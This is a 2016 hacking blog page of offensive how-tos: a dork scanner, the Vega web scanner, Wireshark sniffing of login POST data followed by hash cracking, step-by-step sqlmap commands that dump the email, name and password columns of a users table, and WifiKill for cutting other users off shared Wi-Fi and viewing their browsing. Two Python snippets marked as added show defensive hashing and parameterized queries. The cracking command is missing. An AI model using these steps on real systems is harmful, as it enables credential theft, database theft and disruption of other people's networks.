Sunday 9 October 2016

Simple dork scanner + Dorks list

Features:

2 search engines (Google & Bing)
depth scan
import URLs from file
proxy list
input Google captcha (not available in Bing)

Lfi Dork List 2016

Scan website for vulnerabilities in Kali Linux

Vega is an open source platform for testing the security of web applications. Vega can help you find and validate SQL injections, cross-site scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI-based, and runs on Linux, OS X and Windows.
Vega includes an automated scanner for rapid testing and filtering proxies for tactical inspection. Vega can be expanded using a powerful API in the language of the web: JavaScript.
Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills. We only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you.
== using vega ==
It’s simple: go to Applications -> Kali Linux -> Web Applications -> Web Application Proxies -> vega
And this is how it looks.

Click on “scan” and type a website URL.
Add cookies or a regex exclusion if you want.
The right side will show the vulnerabilities after the scan is completed.

The scanner is not very powerful, but it is quick to audit with: 5 minutes is enough. For a thorough audit it is better to use more powerful tools.

How to sniff password using Wireshark

Wireshark is the world’s foremost network protocol analyzer. It lets you see what’s happening on your network at a microscopic level. It is the de facto (and often de jure) standard across many industries and educational institutions.
This tutorial can be an angel and also a devil at the same time; it depends on who uses it and for which purpose. As the writer of this tutorial, I just hope that all of you use it in the right way, because I believe that none of you want your password sniffed by someone out there, so don’t do that to others either.
Requirements:
1. Wireshark Network Analyzer (wireshark.org)
2. Network card (Wi-Fi card, LAN card, etc.). FYI: for Wi-Fi it should support promiscuous mode.
Step 1: Start Wireshark and capture traffic
In Kali Linux you can start Wireshark by going to
Application > Kali Linux > Top 10 Security Tools > Wireshark
In Wireshark go to Capture > Interface and tick the interface that applies to you. In my case, I am using a Wireless USB card, so I’ve selected wlan0.
Ideally you could just press Start button here and Wireshark will start capturing traffic. In case you missed this, you can always capture traffic by going back to Capture > Interface > Start
Step 2: Filter captured traffic for POST data
At this point Wireshark is listening to all network traffic and capturing it. I opened a browser and signed in to a website using my username and password. When the authentication process was complete and I was logged in, I went back and stopped the capture in Wireshark.
When you type in your username and password and press the Login button, the browser generates a POST request (in short, you’re sending data to the remote server).
To filter all traffic and locate POST data, type the following in the filter section:
http.request.method == "POST"
In this capture it shows 1 POST event.
Step 3: Analyze POST data for username and password
Now right-click on that line and select Follow TCP Stream.
This will open a new window showing the contents of the stream.
So in this case,
username: sampleuser
password: e4b7c855be6e3d4307b8d6ba4cd4ab91
But hold on, e4b7c855be6e3d4307b8d6ba4cd4ab91 can’t be a real password. It must be a hash value.
To crack this password, simply open a new terminal window and type this:
and it looks like this:
username: sampleuser
password: e4b7c855be6e3d4307b8d6ba4cd4ab91:simplepassword
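Why the captured value fell so quickly, and what to store instead, as an added example (not code from the original post): it assumes the 32-hex-digit value is an unsalted MD5-style digest and contrasts that with a salted PBKDF2 hash; the function names and iteration count are assumptions. Hashing does not replace TLS, since any value sent over plain HTTP can be captured and replayed as-is.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

# Assumption: work factor chosen for this example; tune it to your hardware.
PBKDF2_ITERATIONS = 600_000


def unsalted_md5(password: str) -> str:
    """Weak scheme: fast and unsalted, so equal passwords give equal digests."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Stronger scheme: per-user random salt plus a deliberately slow KDF."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS
    )
    return salt, digest


def verify_password(password: str, salt: bytes, expected: bytes) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, expected)


def demo() -> dict:
    sample = "simplepassword"  # sample password from the tutorial above
    salt_a, hash_a = hash_password(sample)
    salt_b, hash_b = hash_password(sample)
    return {
        # Unsalted digest is identical every time, so it can be precomputed.
        "md5_repeats": unsalted_md5(sample) == unsalted_md5(sample),
        "md5_hex_len": len(unsalted_md5(sample)),
        # Two users with the same password get different stored values.
        "salted_differ": hash_a != hash_b,
        "verify_ok": verify_password(sample, salt_a, hash_a),
        "verify_wrong": verify_password("wrongpassword", salt_a, hash_a),
    }


if __name__ == "__main__":
    print(demo())
```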

Exploit SQL Injection Using Sqlmap in kali linux

SQL injection: an attack that exploits non-parametrized SQL queries against a database, so that the attacker can insert their own queries.
Sqlmap: a very powerful open source penetration testing tool that automates the discovery and exploitation of SQL injection vulnerabilities. It has many functions, including detecting the DBMS, enumerating databases, tables and columns, retrieving data and even taking control of a database.
The following tutorial was made on a Linux system (Kali Linux).
First we need a target.
Go to your test website (in this example we have used a PHP one) and navigate between pages; when you see “php?id” in the address bar, copy the address.
Open your terminal and type this:
sqlmap -u www.site.com/product.php?catid=5 --dbs
When sqlmap is done, it will tell you the MySQL version and some other information about the database.

At the end of the process, it will show you the databases that it has found.
To see the tables in a database, type:
sqlmap -u www.site.com/product.php?catid=5 -D acuart --tables


The result should be something like this:
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+
Now that we have a list of tables, we need to get the columns, so type:
sqlmap -u www.site.com/product.php?catid=5 -D acuart -T users --columns

The result should be like this:
As a last step we need to get the data from the columns, so the final command will look like this:
sqlmap -u www.site.com/product.php?catid=5 -D acuart -T users -C email,name,password --dump
And here’s the final result: we have got the name, mail and password.
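The catid parameter in the walkthrough is injectable only when the application builds its query by string concatenation. The added example below (not code from the original post) shows that non-parametrized query beside a validated, parameterized one, using an in-memory SQLite table; the table layout, sample rows and function names are assumptions.

```python
import sqlite3
from typing import List


def make_db() -> sqlite3.Connection:
    """Constructed sample data, loosely modelled on the products table above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER PRIMARY KEY, catid INTEGER, name TEXT);
        INSERT INTO products (catid, name)
        VALUES (5, 'poster'), (5, 'print'), (7, 'frame');
        """
    )
    return conn


def products_vulnerable(conn: sqlite3.Connection, catid: str) -> List[str]:
    """Non-parametrized: the request value becomes part of the SQL text."""
    query = "SELECT name FROM products WHERE catid = " + catid + " ORDER BY id"
    return [row[0] for row in conn.execute(query)]


def products_parameterized(conn: sqlite3.Connection, catid: str) -> List[str]:
    """Hardened: validate the type, then bind the value as data, not SQL."""
    try:
        value = int(catid)
    except ValueError:
        return []  # reject anything that is not a plain integer
    query = "SELECT name FROM products WHERE catid = ? ORDER BY id"
    return [row[0] for row in conn.execute(query, (value,))]


if __name__ == "__main__":
    db = make_db()
    tampered = "5 OR 1=1"  # constructed input that changes the WHERE clause
    print("vulnerable, normal  :", products_vulnerable(db, "5"))
    print("vulnerable, tampered:", products_vulnerable(db, tampered))
    print("hardened, normal    :", products_parameterized(db, "5"))
    print("hardened, tampered  :", products_parameterized(db, tampered))
```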

WifiKill – Disabling WiFi for Other Devices

What is WifiKill?

WifiKill is an Android application that lets you disable other people’s Wi-Fi internet connections on the same network. It is a kind of hacking in which you target another person’s internet connection and try to disable it. This app is developed specifically for Android smartphone users. You can easily become a hacker, as WifiKill literally falls in the category of hacking, and this application is capable of searching for user information in the Wi-Fi modem.
WifiKill v2.3.2 is an amazing app through which you can get a Wi-Fi connection at full speed. You can easily eliminate unnecessary users who are connected to the same Wi-Fi network. You can use this app on your Android smartphone, as it works effectively to disable others’ internet connections.

Features of WifiKill

  • Shows the traffic consumed by the device.
  • Grabs blog traffic and shows the sites visited by the grabbed devices.
  • Shows the network names of the devices.
  • Reveals the total number of bytes transferred by the ‘snatched device’.
  • Capable of disabling the Internet access of any grabbed device.
  • You can also view what others are surfing on the internet and even see what they download.
  • It supports Tablets and hence it is both mobile and tablet-friendly!
  • WifiKill supports Android 4.0 and above only.

Requirements of WifiKill

  • It requires Root accessibility.
  • Works for Android 4.0 and above only.

How to use WifiKill

Using the WifiKill app, you can easily disable the Wi-Fi internet connection of a device on the same network. The capability of disabling another person’s Wi-Fi network connection is nothing but hacking their device. Here is a step-by-step procedure to hack a Wi-Fi network using the WifiKill app on your Android device.

Step 1: Initially, download it from the above link.
Step 2: Now, turn ON Wi-Fi on your Android phone and click to open the app.
Step 3: After opening the app, press the play button located at the top, and the app will start searching for the devices currently connected to the wireless network. Click on Grant to allow the Superuser permission that is prompted on the screen.
Step 4: As soon as the scan for devices is completed, the app will show all the devices connected to the hotspot. If you enable Show Network Names in the preferences, it will also display the names of all the devices found.
Step 5: Now, click on one device and slide the grab button. Once it is grabbed, you can see its network usage and the websites it is accessing.

Step 6: You can kill one device at a time, or you can kill all the devices at the same time by grabbing them all and then killing them. You can only kill a device after you have grabbed it. Grabbing the device will show you the bandwidth consumption and websites accessed by that particular device. The device will lose internet connectivity when you choose to kill it.

Step 7: When you are done, you can just switch off the kill button so that the devices regain their Internet connectivity. Also, don’t forget to stop WifiKill by using the same button you used to start it.